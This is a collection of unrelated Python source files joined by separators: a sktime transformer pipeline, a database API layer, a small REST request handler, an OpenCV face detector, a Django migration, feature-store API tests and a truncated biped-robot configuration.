unit_pkl, label_pkl = _vocab_names(argv.data_path, config)
unit_vocab.save(unit_pkl)
label_vocab.save(label_pkl)
unit_tsv, label_tsv = _vocab_names(argv.data_path, config, Vocabulary.FORMAT_TSV_WITH_HEADERS)
unit_vocab.save(unit_tsv, Vocabulary.FORMAT_TSV_WITH_HEADERS)
label_vocab.save(label_tsv, Vocabulary.FORMAT_TSV_WITH_HEADERS)
tf.get_logger().info('Vocabularies saved to {}'.format(argv.data_path))
|
# -*- coding: utf-8 -*-
"""Meta-transformers for building composite transformers."""
# copyright: sktime developers, BSD-3-Clause License (see LICENSE file)
from sklearn.base import clone
from sktime.base import _HeterogenousMetaEstimator
from sktime.transformations.base import BaseTransformer
__author__ = ["fkiraly"]
__all__ = ["TransformerPipeline"]
class TransformerPipeline(BaseTransformer, _HeterogenousMetaEstimator):
"""Pipeline of transformers compositor.
The `TransformerPipeline` compositor allows to chain transformers.
The pipeline is constructed with a list of sktime transformers,
i.e., estimators following the BaseTransformer interface.
The list can be unnamed - a simple list of transformers -
or string named - a list of pairs of string, estimator.
For a list of transformers `trafo1`, `trafo2`, ..., `trafoN`,
the pipeline behaves as follows:
`fit` - changes state by running `trafo1.fit_transform`, `trafo2.fit_transform`, etc
sequentially, with `trafo[i]` receiving the output of `trafo[i-1]`
`transform` - result is of executing `trafo1.transform`, `trafo2.transform`, etc
with `trafo[i].transform` input = output of `trafo[i-1].transform`,
and returning the output of `trafoN.transform`
`inverse_transform` - result is of executing `trafo[i].inverse_transform`,
with `trafo[i].inverse_transform` input = output `trafo[i-1].inverse_transform`,
and returning the output of `trafoN.inverse_transform`
`update` - changes state by chaining `trafo1.update`, `trafo1.transform`,
`trafo2.update`, `trafo2.transform`, ..., `trafoN.update`,
where `trafo[i].update` and `trafo[i].transform` receive as input
the output of `trafo[i-1].transform`
`get_params`, `set_params` uses `sklearn` compatible nesting interface
if list is unnamed, names are generated as names of classes
if names are non-unique, `f"_{str(i)}"` is appended to each name string
where `i` is the total count of occurrence of a non-unique string
inside the list of names leading up to it (inclusive)
`TransformerPipeline` can also be created by using the magic multiplication
on any transformer, i.e., any estimator inheriting from `BaseTransformer`
for instance, `my_trafo1 * my_trafo2 * my_trafo3`
will result in the same object as obtained from the constructor
`TransformerPipeline([my_trafo1, my_trafo2, my_trafo3])`
magic multiplication can also be used with (str, transformer) pairs,
as long as one element in the chain is a transformer
Parameters
----------
steps : list of sktime transformers, or
list of tuples (str, transformer) of sktime transformers
these are "blueprint" transformers, states do not change when `fit` is called
Attributes
----------
steps_ : list of tuples (str, transformer) of sktime transformers
clones of transformers in `steps` which are fitted in the pipeline
is always in (str, transformer) format, even if `steps` is just a list
strings not passed in `steps` are replaced by unique generated strings
i-th transformer in `steps_` is clone of i-th in `steps`
Examples
--------
>>> # we'll construct a pipeline from 2 transformers below, in three different ways
>>> # preparing the transformers
>>> from sktime.transformations.series.exponent import ExponentTransformer
>>> t1 = ExponentTransformer(power=2)
>>> t2 = ExponentTransformer(power=0.5)
>>> # Example 1: construct without strings
>>> pipe = TransformerPipeline(steps = [t1, t2])
>>> # unique names are generated for the two components t1 and t2
>>> # Example 2: construct with strings to give custom names to steps
>>> pipe = TransformerPipeline(
... steps = [
... ("trafo1", t1),
... ("trafo2", t2),
... ]
... )
>>> # Example 3: for quick construction, the * dunder method can be used
>>> pipe = t1 * t2
"""
_required_parameters = ["steps"]
# no default tag values - these are set dynamically below
def __init__(self, steps):
self.steps = steps
self.steps_ = self._check_estimators(steps)
super(TransformerPipeline, self).__init__()
first_trafo = self.steps_[0][1]
last_trafo = self.steps_[-1][1]
self.clone_tags(first_trafo, ["X_inner_mtype", "scitype:transform-input"])
self.clone_tags(last_trafo, "scitype:transform-output")
self._anytag_notnone_set("y_inner_mtype")
self._anytag_notnone_set("scitype:transform-labels")
self._anytagis_then_set("scitype:instancewise", False, True)
self._anytagis_then_set("X-y-must-have-same-index", True, False)
self._anytagis_then_set("fit_is_empty", False, True)
self._anytagis_then_set("transform-returns-same-time-index", False, True)
self._anytagis_then_set("skip-inverse-transform", True, False)
self._anytagis_then_set("capability:inverse_transform", False, True)
self._anytagis_then_set("handles-missing-data", False, True)
self._anytagis_then_set("univariate-only", True, False)
@property
def _steps(self):
return self._get_estimator_tuples(self.steps, clone_ests=False)
@_steps.setter
def _steps(self, value):
self.steps = value
def __mul__(self, other):
"""Magic * method, return (right) concatenated TransformerPipeline.
Implemented for `other` being a transformer, otherwise returns `NotImplemented`.
Parameters
----------
other: `sktime` transformer, must inherit from BaseTransformer
otherwise, `NotImplemented` is returned
Returns
-------
TransformerPipeline object, concatenation of `self` (first) with `other` (last).
not nested, contains only non-TransformerPipeline `sktime` transformers
"""
# we don't use names but _get_estimator_names to get the *original* names
# to avoid multiple "make unique" calls which may grow strings too much
_, trafos = zip(*self.steps_)
names = tuple(self._get_estimator_names(self.steps))
if isinstance(other, TransformerPipeline):
_, trafos_o = zip(*other.steps_)
names_o = tuple(other._get_estimator_names(other.steps))
new_names = names + names_o
new_trafos = trafos + trafos_o
elif isinstance(other, BaseTransformer):
new_names = names + (type(other).__name__,)
new_trafos = trafos + (other,)
elif self._is_name_and_trafo(other):
other_name = other[0]
other_trafo = other[1]
new_names = names + (other_name,)
new_trafos = trafos + (other_trafo,)
else:
return NotImplemented
# if all the names are equal to class names, we eat them away
if all(type(x[1]).__name__ == x[0] for x in zip(new_names, new_trafos)):
return TransformerPipeline(steps=list(new_trafos))
else:
return TransformerPipeline(steps=list(zip(new_names, new_trafos)))
def __rmul__(self, other):
"""Magic * method, return (left) concatenated TransformerPipeline.
Implemented for `other` being a transformer, otherwise returns `NotImplemented`.
Parameters
----------
other: `sktime` transformer, must inherit from BaseTransformer
otherwise, `NotImplemented` is returned
Returns
-------
TransformerPipeline object, concatenation of `other` (first) with `self` (last).
not nested, contains only non-TransformerPipeline `sktime` steps
"""
_, trafos = zip(*self.steps_)
names = tuple(self._get_estimator_names(self.steps))
if isinstance(other, TransformerPipeline):
_, trafos_o = zip(*other.steps_)
names_o = tuple(other._get_estimator_names(other.steps))
new_names = names_o + names
new_trafos = trafos_o + trafos
elif isinstance(other, BaseTransformer):
new_names = (type(other).__name__,) + names
new_trafos = (other,) + trafos
elif self._is_name_and_trafo(other):
other_name = other[0]
other_trafo = other[1]
new_names = (other_name,) + names
new_trafos = (other_trafo,) + trafos
else:
return NotImplemented
# if all the names are equal to class names, we eat them away
if all(type(x[1]).__name__ == x[0] for x in zip(new_names, new_trafos)):
return TransformerPipeline(steps=list(new_trafos))
else:
return TransformerPipeline(steps=list(zip(new_names, new_trafos)))
@staticmethod
def _is_name_and_trafo(obj):
if not isinstance(obj, tuple) or len(obj) != 2:
return False
if not isinstance(obj[0], str) or not isinstance(obj[1], BaseTransformer):
return False
return True
def _make_strings_unique(self, strlist):
"""Make a list or tuple of strings unique by appending _int of occurrence."""
# if already unique, just return
if len(set(strlist)) == len(strlist):
return strlist
# we convert internally to list, but remember whether it was tuple
if isinstance(strlist, tuple):
strlist = list(strlist)
was_tuple = True
else:
was_tuple = False
from collections import Counter
strcount = Counter(strlist)
# if any duplicates, we append _integer of occurrence to non-uniques
nowcount = Counter()
uniquestr = strlist
for i, x in enumerate(uniquestr):
if strcount[x] > 1:
nowcount.update([x])
uniquestr[i] = x + "_" + str(nowcount[x])
if was_tuple:
uniquestr = tuple(uniquestr)
# repeat until all are unique
# the algorithm recurses, but will always terminate
# because potential clashes are lexicographically increasing
return self._make_strings_unique(uniquestr)
def _anytagis(self, tag_name, value):
"""Return whether any estimator in list has tag `tag_name` of value `value`."""
tagis = [est.get_tag(tag_name, value) == value for _, est in self.steps_]
return any(tagis)
def _anytagis_then_set(self, tag_name, value, value_if_not):
"""Set self's `tag_name` tag to `value` if any estimator on the list has it."""
if self._anytagis(tag_name=tag_name, value=value):
self.set_tags(**{tag_name: value})
else:
self.set_tags(**{tag_name: value_if_not})
def _anytag_notnone_val(self, tag_name):
"""Return first non-'None' value of tag `tag_name` in estimator list."""
for _, est in self.steps_:
tag_val = est.get_tag(tag_name)
if tag_val != "None":
return tag_val
return tag_val
def _anytag_notnone_set(self, tag_name):
"""Set self's `tag_name` tag to first non-'None' value in estimator list."""
tag_val = self._anytag_notnone_val(tag_name=tag_name)
if tag_val != "None":
self.set_tags(**{tag_name: tag_val})
def _fit(self, X, y=None):
"""Fit transformer to X and y.
private _fit containing the core logic, called from fit
Parameters
----------
X : Series or Panel of mtype X_inner_mtype
if X_inner_mtype is list, _fit must support all types in it
Data to fit transform to
y : Series or Panel of mtype y_inner_mtype, default=None
Additional data, e.g., labels for transformation
Returns
-------
self: reference to self
"""
Xt = X
for _, transformer in self.steps_:
Xt = transformer.fit_transform(X=Xt, y=y)
return self
def _transform(self, X, y=None):
"""Transform X and return a transformed version.
private _transform containing core logic, called from transform
Parameters
----------
X : Series or Panel of mtype X_inner_mtype
if X_inner_mtype is list, _transform must support all types in it
Data to be transformed
y : Series or Panel of mtype y_inner_mtype, default=None
Additional data, e.g., labels for transformation
Returns
-------
transformed version of X
"""
Xt = X
for _, transformer in self.steps_:
if not self.get_tag("fit_is_empty", False):
Xt = transformer.transform(X=Xt, y=y)
else:
Xt = transformer.fit_transform(X=Xt, y=y)
return Xt
def _inverse_transform(self, X, y=None):
"""Inverse transform, inverse operation to transform.
private _inverse_transform containing core logic, called from inverse_transform
Parameters
----------
X : Series or Panel of mtype X_inner_mtype
if X_inner_mtype is list, _inverse_transform must support all types in it
Data to be inverse transformed
y : Series or Panel of mtype y_inner_mtype, optional (default=None)
Additional data, e.g., labels for transformation
Returns
-------
inverse transformed version of X
"""
Xt = X
for _, transformer in self.steps_:
Xt = transformer.inverse_transform(X=Xt, y=y)
return Xt
def _update(self, X, y=None):
"""Update transformer with X and y.
private _update containing the core logic, called from update
Parameters
----------
X : Series or Panel of mtype X_inner_mtype
if X_inner_mtype is list, _update must support all types in it
Data to update transformer with
y : Series or Panel of mtype y_inner_mtype, default=None
Additional data, e.g., labels for tarnsformation
Returns
-------
self: reference to self
"""
Xt = X
for _, transformer in self.steps_:
transformer.update(X=Xt, y=y)
Xt = transformer.transform(X=Xt, y=y)
return self
def get_params(self, deep=True):
"""Get parameters of estimator in `steps`.
Parameters
----------
deep : boolean, optional
If True, will return the parameters for this estimator and
contained sub-objects that are estimators.
Returns
-------
params : mapping of string to any
Parameter names mapped to their values.
"""
return self._get_params("_steps", deep=deep)
def set_params(self, **kwargs):
"""Set the parameters of estimator in `steps`.
Valid parameter keys can be listed with ``get_params()``.
Returns
-------
self : returns an instance of self.
"""
self._set_params("_steps", **kwargs)
return self
def _check_estimators(self, estimators, attr_name="steps"):
msg = (
f"Invalid '{attr_name}' attribute, '{attr_name}' should be a list"
" of estimators, or a list of (string, estimator) tuples."
)
if (
estimators is None
or len(estimators) == 0
or not isinstance(estimators, list)
):
raise TypeError(msg)
if not isinstance(estimators[0], (BaseTransformer, tuple)):
raise TypeError(msg)
if isinstance(estimators[0], BaseTransformer):
if not all(isinstance(est, BaseTransformer) for est in estimators):
raise TypeError(msg)
if isinstance(estimators[0], tuple):
if not all(isinstance(est, tuple) for est in estimators):
raise TypeError(msg)
if not all(isinstance(est[0], str) for est in estimators):
raise TypeError(msg)
if not all(isinstance(est[1], BaseTransformer) for est in estimators):
raise TypeError(msg)
return self._get_estimator_tuples(estimators, clone_ests=True)
def _get_estimator_list(self, estimators):
"""Return list of estimators, from a list or tuple.
Arguments
---------
estimators : list of estimators, or list of (str, estimator tuples)
Returns
-------
list of estimators - identical with estimators if list of estimators
if list of (str, estimator) tuples, the str get removed
"""
if isinstance(estimators[0], tuple):
return [x[1] for x in estimators]
else:
return estimators
def _get_estimator_names(self, estimators, make_unique=False):
"""Return names for the estimators, optionally made unique.
Arguments
---------
estimators : list of estimators, or list of (str, estimator tuples)
make_unique : bool, optional, default=False
whether names should be made unique in the return
Returns
-------
names : list of str, unique entries, of equal length as estimators
names for estimators in estimators
if make_unique=True, made unique using _make_strings_unique
"""
if estimators is None or len(estimators) == 0:
names = []
elif isinstance(estimators[0], tuple):
names = [x[0] for x in estimators]
elif isinstance(estimators[0], BaseTransformer):
names = [type(e).__name__ for e in estimators]
else:
raise RuntimeError(
"unreachable condition in _get_estimator_names, "
" likely input assumptions are violated,"
" run _check_estimators before running _get_estimator_names"
)
if make_unique:
names = self._make_strings_unique(names)
return names
def _get_estimator_tuples(self, estimators, clone_ests=False):
"""Return list of estimator tuples, from a list or tuple.
Arguments
---------
estimators : list of estimators, or list of (str, estimator tuples)
clone_ests : bool, whether estimators get cloned in the process
Returns
-------
est_tuples : list of (str, estimator) tuples
if estimators was a list of (str, estimator) tuples, then identical/cloned
if was a list of estimators, then str are generated via _name_names
"""
ests = self._get_estimator_list(estimators)
if clone_ests:
ests = [clone(e) for e in ests]
unique_names = self._get_estimator_names(estimators, make_unique=True)
est_tuples = list(zip(unique_names, ests))
return est_tuples
@classmethod
def get_test_params(cls):
"""Return testing parameter settings for the estimator.
Returns
-------
params : dict or list of dict, default={}
Parameters to create testing instances of the class.
Each dict are parameters to construct an "interesting" test instance, i.e.,
`MyClass(**params)` or `MyClass(**params[i])` creates a valid test instance.
`create_test_instance` uses the first (or only) dictionary in `params`.
"""
# imports
from sktime.transformations.series.exponent import ExponentTransformer
t1 = ExponentTransformer(power=2)
t2 = ExponentTransformer(power=0.5)
t3 = ExponentTransformer(power=1)
# construct without names
params1 = {"steps": [t1, t2]}
# construct with names
params2 = {"steps": [("foo", t1), ("bar", t2), ("foobar", t3)]}
# construct with names and provoke multiple naming clashes
params3 = {"steps": [("foo", t1), ("foo", t2), ("foo_1", t3)]}
return [params1, params2, params3]
|
from oslo_config import cfg
from hsm import flags
from hsm import utils
db_opts = [
cfg.StrOpt('db_backend',
default='sqlalchemy',
help='The backend to use for db'),
cfg.BoolOpt('enable_new_services',
default=True,
help='Services to be added to the available pool on create')]
FLAGS = flags.FLAGS
FLAGS.register_opts(db_opts)
IMPL = utils.LazyPluggable('db_backend',
sqlalchemy='hsm.db.sqlalchemy.api')
####################
# Service
####################
def service_destroy(context, service_id):
"""Destroy the service or raise if it does not exist."""
return IMPL.service_destroy(context, service_id)
def service_get(context, service_id):
"""Get a service or raise if it does not exist."""
return IMPL.service_get(context, service_id)
def service_get_all(context, disabled=None):
"""Get all services."""
return IMPL.service_get_all(context, disabled)
def service_get_all_by_topic(context, topic):
"""Get all services for a given topic."""
return IMPL.service_get_all_by_topic(context, topic)
def service_get_by_args(context, host, binary):
"""Get the state of an service by node name and binary."""
return IMPL.service_get_by_args(context, host, binary)
def service_create(context, values):
"""Create a service from the values dictionary."""
return IMPL.service_create(context, values)
def service_update(context, service_id, values):
"""Set the given properties on an service and update it.
Raises NotFound if service does not exist.
"""
return IMPL.service_update(context, service_id, values)
####################
# Server
####################
def server_create(context, values):
"""Create a new server."""
return IMPL.server_create(context, values)
def server_get_by_host(context, host):
"""Get a server by name."""
return IMPL.server_get_by_host(context, host)
def server_update(context, server_id, values):
"""Update a server by server id."""
return IMPL.server_update(context, server_id, values)
def server_get_all(context):
"""Get a list of servers."""
return IMPL.server_get_all(context)
def server_get(context, server_id):
"""Get a detail info of a server by id."""
return IMPL.server_get(context, server_id)
####################
# Hs_Instance
####################
def hs_instance_create(context, values):
"""Create a new hyperstash instance."""
return IMPL.hs_instance_create(context, values)
def hs_instance_get_all(context):
"""Get a list of hyperstash instances."""
return IMPL.hs_instance_get_all(context)
def hs_instance_get(context, hs_instance_id):
"""Get a detail info of a hyperstash instance by id."""
return IMPL.hs_instance_get(context, hs_instance_id)
def hs_instance_delete(context, hs_instance_id):
"""Delete the hyperstash instance from the db."""
return IMPL.hs_instance_delete(context, hs_instance_id)
def hs_instance_get_by_host(context, host):
"""Get a detail info of a hyperstash instance by host."""
return IMPL.hs_instance_get_by_host(context, host)
####################
# RBD
####################
def rbd_create(context, values):
"""Create a new rbd info into db."""
return IMPL.rbd_create(context, values)
def rbd_get_all_by_hs_instance_id(context, hs_instance_id):
"""Get a list of rbds by hyperstash instance id."""
return IMPL.rbd_get_all_by_hs_instance_id(context, hs_instance_id)
def rbd_delete(context, rbd_id):
"""Delete the rbd from the db."""
return IMPL.rbd_delete(context, rbd_id)
def rbd_get_all(context):
"""Get a list of rbds."""
return IMPL.rbd_get_all(context)
def rbd_get(context, rbd_id):
"""Get a detail info of a rbd by id."""
return IMPL.rbd_get(context, rbd_id)
def rbd_get_by_name(context, name):
"""Get a detail info of a rbd by name."""
return IMPL.rbd_get_by_name(context, name)
def rbd_update(context, rbd_id, values):
"""Update a rbd by rbd id."""
return IMPL.rbd_update(context, rbd_id, values)
####################
# Performance Metric
####################
def performance_metric_get_by_rbd_name(context, rbd_name):
"""Get values by rbd name."""
return IMPL.performance_metric_get_by_rbd_name(context, rbd_name)
####################
# RBD Cache Config
####################
def rbd_cache_config_get_all(context):
"""Get a list of rbd cache configs."""
return IMPL.rbd_cache_config_get_all(context)
def rbd_cache_config_get(context, rbd_cache_config_id):
"""Get a detail info of a rbd cache config by id."""
return IMPL.rbd_cache_config_get(context, rbd_cache_config_id)
def rbd_cache_config_get_by_rbd_id(context, rbd_id):
"""Get a detail info of a rbd cache config by rbd id."""
return IMPL.rbd_cache_config_get_by_rbd_id(context, rbd_id)
def rbd_cache_config_create(context, values):
"""Create a new rbd cache config into db."""
return IMPL.rbd_cache_config_create(context, values)
def rbd_cache_config_delete_by_rbd_id(context, rbd_id):
"""Delete a rbd cache config by rbd id."""
return IMPL.rbd_cache_config_delete_by_rbd_id(context, rbd_id)
def rbd_cache_config_update(context, rbd_cache_config_id, values):
"""Update a rbd cache config by id."""
return IMPL.rbd_cache_config_update(context, rbd_cache_config_id, values)
####################
# Periodic Task
####################
def performance_metric_clean_up_data(context, seconds):
IMPL.performance_metric_clean_up_data(context, seconds)
|
import Config
import http.server
import json
import os
import time
import urllib.parse
from pymongo import cursor
class REST(http.server.BaseHTTPRequestHandler):
"""
The RequestHandler-class gets instantiated once per HTTP-request and handles it.
Every HTTP-request is passed to the related HTTP Method handler.
A GET-Request gets passed to the do_GET-method, and so on.
Then the url and headers are parsed and the related interface-function called
with the extracted parameters.
"""
#HTTP-METHOD-HANDLERS
def do_GET(self):
self._set_session()
parsed = urllib.parse.urlparse(self.path)
path = parsed[2]
query = self._remove_array(urllib.parse.parse_qs(parsed[4]))
self._handle_path(path, query)
def do_POST(self):
self._set_session()
parsed = urllib.parse.urlparse(self.path)
path = parsed[2]
body = self._get_body()
self._handle_path(path, body)
def do_PUT(self):
self._set_session()
parsed = urllib.parse.urlparse(self.path)
path = parsed[2]
body = self._get_body()
self._handle_path(path, body)
def do_DELETE(self):
self._set_session()
parsed = urllib.parse.urlparse(self.path)
path = parsed[2]
self._handle_path(path, None)
def log_message(self, format, *args):
"""
overwrites the log_message function of the BaseHTTPRequestHandler.
prevents unnecessary output.
"""
return
#HELPER FUNCTIONS
def _create_response(self, result, data, code):
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
response = {
"result": result,
"data": data,
"http_code": code
}
dump = json.dumps(response)
self.wfile.write(bytes(dump, 'utf-8'))
def _remove_array(self, d):
"""
the urllib parser returns parameter-arrays.
this function removes the array, if just one value is inside
and returns the value without it
"""
for key, value in d.items():
if isinstance(value, list) and len(value) == 1:
d[key] = value[0]
return d
def _get_body(self):
"""
reads the body-length of the header and parses for the given length.
If possible, the body is returned as json, otherwise in its raw form.
"""
content_len = int(self.headers.get('content-length'))
body_utf_8 = self.rfile.read(content_len)
body = body_utf_8.decode('utf-8')
try:
body = json.loads(body)
except ValueError:
pass
return body
def _has_rights(self, command):
"""
checks if a user has the right to perform a command.
the allowed commands are defined in the config-file.
"""
active = False
registered = False
if self.session['user'] is None:
if command not in Config.COMMANDS_UNKNOWN:
return False
return True
else:
if command not in Config.COMMANDS_USER:
return False
return True
def _set_session(self):
"""
extracts the token from the http-request(field x-bb-session)
and looks for a corresponding session.
"""
#if self.headers.get('connection') == 'keep-alive':
# self.server.write('keeping connection alive')
# self.close_connection = False
#else:
# self.close_connection = True
if 'x-bb-session' in self.headers:
token = self.headers['x-bb-session']
if not hasattr(self, 'session'):
session = self.server.get_session(token)
if session:
self.session = session
if not hasattr(self, 'session'):
self.session = self.server.get_default_session()
if not self.server.is_muted_requesthandler():
self.server.write(str(self.session['user'] and self.session['user']['user']) + ': ' + self.path)
def _handle_path(self, path, params):
"""
extracts the parameters of the url and calls the appropriate interface-function,
provided that the user has the required rights.
"""
path_array = path.lstrip('/').split('/')
if len(path_array) < 1:
return self._handle_error('path is invalid')
elif self._has_rights(path_array[0]) is False:
self.server.write_err('USER HAS NO RIGHT TO DO THIS')
else:
function = getattr(self, '_intf_' + path_array[0], None)
if function:
return function(path_array, params)
else:
self.server.write_err('interface does not exist')
def _handle_cursor(self, cursor):
"""
if a plugin-function returns a database-cursor,
this function extracts the documents and packs them into a list.
"""
result_size = cursor.count()
data = []
for result in cursor:
data.append(result)
return data
def _handle_error(self, message):
"""
this function is so far only called when an invalid path is given.
more error handling should happen here in future.
"""
data = {
"result": "error",
"message": message,
"resource": self.path,
"method": self.command,
"request-header": str(self.headers)
}
self._create_response('error', data, 401)
#----- INTERFACE FUNCTIONS -----
def _intf_asset(self, path_array, params):
"""
A client can request a file here.
So far only one file exists: the game-configuration.
"""
filename = path_array[1] + '.json'
with open(os.getcwd() + '/assets/' + filename, 'r') as f:
try:
asset = json.load(f)
return self._create_response('ok', asset, 200)
except ValueError:
self.server.write('gameConfiguration could not be parsed')
return None
def _intf_document(self, path_array, params):
"""
inserts a document into a database-collection.
the collection is given in the path_array and params is the actual document
"""
collection = path_array[1]
if collection in self.session['plugins']:
plugin = self.session['plugins'][collection]
if 'insert' in plugin.get_public_endpoint():
doc = plugin.insert(params)
if doc:
return self._create_response('ok', doc, 201)
def _intf_following(self, path_array, params):
"""
Returns users which the session-owner is following
"""
assert len(path_array) == 2
following = self.session['plugins']['users'].get_following(path_array[1])
self._create_response('ok', following, 200)
def _intf_followers(self, path_array, params):
"""
Returns the followers of the session-owner
"""
assert len(path_array) == 2
followers = self.session['plugins']['users'].get_followers(path_array[1])
self._create_response('ok', followers, 200)
def _intf_follow(self, path_array, params):
"""
Adds a user with given username to the following-array of the session-owner
"""
assert len(path_array) == 2
updated_user = None
userP = self.session['plugins']['users']
if self.command == 'DELETE':
updated_user = userP.set_unfollow(path_array[1])
else:
updated_user = userP.set_follow(path_array[1])
if updated_user is not None:
self._create_response('ok', self.session['user'], 200)
def _intf_login(self, path_array, params):
"""
login with credentials.
if this is successfull, create a new sesison-object and return token
"""
assert 'username' in params
assert 'password' in params
params = self._remove_array(urllib.parse.parse_qs(params))
username = params['username']
password = params['password']
new_session = self.server.authenticate(username, password)
if new_session:
self.session = new_session
return self._create_response('ok', {'user': self.session['user'], 'token':self.session['token']}, 200)
else:
self.server.write('authentication unsuccessfull')
def _intf_logout(self, path_array, params):
"""
logout, i.e. delete session-object
"""
if self.session['user'] is not None:
self.server.delete_session(self.session)
return self._create_response('ok', None, 200)
def _intf_me(self, path_array, params):
"""
returns the user-document of the session-owner
"""
if 'user' in self.session and self.session['user']['_id'] != 'admin.default':
user = self.session['user']
if self.command == 'PUT':
assert params
user = self.session['plugins']['users'].update_fields(params)
assert user
self.session['user'] = user
return self._create_response('ok', user, 200)
def _intf_plugin(self, path_array, params):
"""
calls a public endpoint of a plugin.
A plugin-function is a public-endpoint, if it is inside the public-endpoint-array of the plugin.
An example is the public-endpoint function get_by_id() of the arguments-plugin.
"""
plugin = path_array[1]
function = path_array[2]
if plugin in self.session['plugins']:
plugin = self.session['plugins'][plugin]
if function in plugin.get_public_endpoint():
function = getattr(plugin, function, None)
result = function(params)
data = {}
if type(result) is cursor.Cursor:
data = self._handle_cursor(result)
else: data = result
self._create_response('ok', data, 200)
else:
self.server.write('no public endpoint defined with name ' + function)
return None
else:
self.server.write('no plugin found with name ' + plugin)
return None
def _intf_user(self, path_array, params):
"""
either return an existing user with given username or create a new user (depends on the HTTP method).
In the second case a registration takes place.
The registraion could, bot does not, use the _intf_document (defined by Baasbox-Protocol)
"""
userP = self.session['plugins']['users']
user = None
if self.command == 'GET':
assert len(path_array) > 1
user = userP.get_user(path_array[1])
elif self.command == 'POST':
assert 'username' in params and 'password' in params and 'email' in params and 'lang' in params
user = userP.insert(params['username'], params['password'], params['email'], params['lang'])
if user:
return self._create_response('ok', user, 200)
|
import cv2
import numpy as np
face_cascade = cv2.CascadeClassifier('/users/shreykhandelwal/opencv/haarcascade_frontalface_default.xml')
cap = cv2.VideoCapture(0)
while True:
ret, frame= cap.read()
frame = cv2.resize(frame, None, fx= 0.5, fy= 0.5, interpolation= cv2.INTER_AREA)
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
face_rects = face_cascade.detectMultiScale(gray, 1.3, 5)
for (x, y, w, h) in face_rects:
cv2.rectangle(frame, (x,y), (x+w, y+h), (0,255, 0), 3)
cv2.imshow('face detector', frame)
c = cv2.waitKey(0)
if c==27:
break
cap.release()
cv2.destroyAllWindows()
|
f = open('a.txt')
f.read()
print(f)
|
# Generated by Django 2.1.5 on 2019-04-16 08:51
import CRM.models
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('CRM', '0006_auto_20190319_0815'),
]
operations = [
migrations.AlterField(
model_name='client',
name='copy_of_id',
field=models.FileField(blank=True, upload_to=CRM.models.UploadFolder('documents/clients')),
),
]
|
from typing import List
from requests.auth import HTTPBasicAuth
from shared.logger.logging_config import logger
from shared.models.feature_store_models import Feature, FeatureSet
from ...rest_api import crud
from ..fixtures.conftest import APP, get_my_session, override_get_db, test_app
from ..fixtures.feature import (create_deployed_fset, create_undeployed_fset,
test_session_create)
APP.dependency_overrides[crud.get_db] = override_get_db
basic_auth = HTTPBasicAuth('user','password')
bad_feature = {
"name": 'feature_without_feature_set',
"description": 'a feature that should fail because there is no feature set',
"feature_data_type": {'data_type': 'VARCHAR','length':250},#'VARCHAR(250)',
"feature_type": 'C',
"tags": None
}
good_feature = {
"name": 'good_feature',
"description": 'a feature that should succeed because there is a feature set',
"feature_data_type": {'data_type': 'VARCHAR','length':250},#'VARCHAR(250)',
"feature_type": 'C',
"tags": None
}
def test_create_feature_no_auth(test_app):
response = test_app.post('/features',params={'schema': 'fake_schema', 'table': 'badtable'}, json=bad_feature)
assert response.status_code == 401, 'Should fail because there is no authentication'
mes = response.json()['message']
assert mes == 'Not authenticated', mes
def test_create_feature_no_feature_set(test_app, create_undeployed_fset):
APP.dependency_overrides[crud.get_db] = lambda: (yield create_undeployed_fset) # Give the "server" the same db session
response = test_app.post('/features',params={'schema': 'fake_schema', 'table': 'badtable'},
json=bad_feature, auth=basic_auth)
assert response.status_code == 404, 'Should fail because there is no feature set with provided name'
mes = response.json()['message']
assert 'Feature Set ' in mes and 'does not exist' in mes, mes
def test_create_feature_existing_feature_set(test_app, create_undeployed_fset):
APP.dependency_overrides[crud.get_db] = lambda: (yield create_undeployed_fset) # Give the "server" the same db session
logger.info("============================= Starting test_create_feature_existing_feature_set =============================")
response = test_app.post('/features',params={'schema': 'test_fs', 'table': 'FSET_1'},
json=good_feature, auth=basic_auth)
assert response.status_code == 201, response.json()['message']
# Assert feature exists
fs: List[Feature] = create_undeployed_fset.query(Feature).all()
assert len(fs) == 1, f'Only one feature should exist, but {len(fs)} do'
assert fs[0].name == 'good_feature'
def test_create_feature_deployed_feature_set_upper_case(test_app, create_deployed_fset):
APP.dependency_overrides[crud.get_db] = lambda: (yield create_deployed_fset) # Give the "server" the same db session
logger.info("============================= Starting test_create_feature_existing_feature_set =============================")
response = test_app.post('/features',params={'schema': 'test_fs', 'table': 'FSET_1'}, # Upper case schema/table
json=good_feature, auth=basic_auth)
assert response.status_code == 409, f'Should fail because the Feature Set is already deployed. ' \
f'Status Code: {response.status_code}, response: {response.json()}'
def test_create_feature_deployed_feature_set_lower_case(test_app, create_deployed_fset):
APP.dependency_overrides[crud.get_db] = lambda: (yield create_deployed_fset) # Give the "server" the same db session
logger.info("============================= Starting test_create_feature_existing_feature_set =============================")
response = test_app.post('/features',params={'schema': 'test_fs', 'table': 'FSET_1'}, # Lower case schema/table
json=good_feature, auth=basic_auth)
assert response.status_code == 409, response.json()['message']
def test_db_setup(test_session_create):
logger.info("============================= Starting test_db_setup =============================")
sess = test_session_create
assert len(sess.query(FeatureSet).all())==1
assert not sess.query(FeatureSet).one().deployed
|
'''
双足机器人的配置文件
'''
#############################
## 树莓派版本号
##
#############################
RASP_VERSION = 4
#############################
## DBSP参数
##
#############################
# DBSP树莓派拓展版对应的端口号
DBSP_PORT_NAME = '/dev/ttyAMA0' if RASP_VERSION == 3 else '/dev/ttyS0'
# DBSP串口连接的波特率
DBSP_BAUDRATE = 57600
#############################
## DBSP拓展板GPIO定义
##
#############################
LAMP_GPIO = 'GPIO4' # 补光灯在拓展板上的GPIO
HEAD_SERVO_ID = 0x31 # 舵机头部的ID号
HEAD_SERVO_ANGLE = -60 # 舵机的角度
# 注:正负取决于舵机的安装方向
#############################
## DBSP动作组 Marco参数
##
#############################
# 站立的MarcoID
MARCO_STAND_UP_ID = 100000130
# 站立的执行周期(单位: ms)
MARCO_STAND_UP_INTERVAL = 336
# 站立预备的MarcoID
MARCO_STAND_UP_PRE_ID = 935570809
# 站立预备的执行周期(单位: ms)
MARCO_STAND_UP_PRE_INTERVAL = 150
# 前进的MarcoID
MARCO_GO_FORWARD_ID = 100000136
MARCO_GO_FORWARD_INTERVAL = 380 # 500
# 前进左偏的MarcoID
MARCO_GO_LEFT_ID = 1071071745
MARCO_GO_LEFT_INTERVAL = 480
# 前进右偏的MarcoID
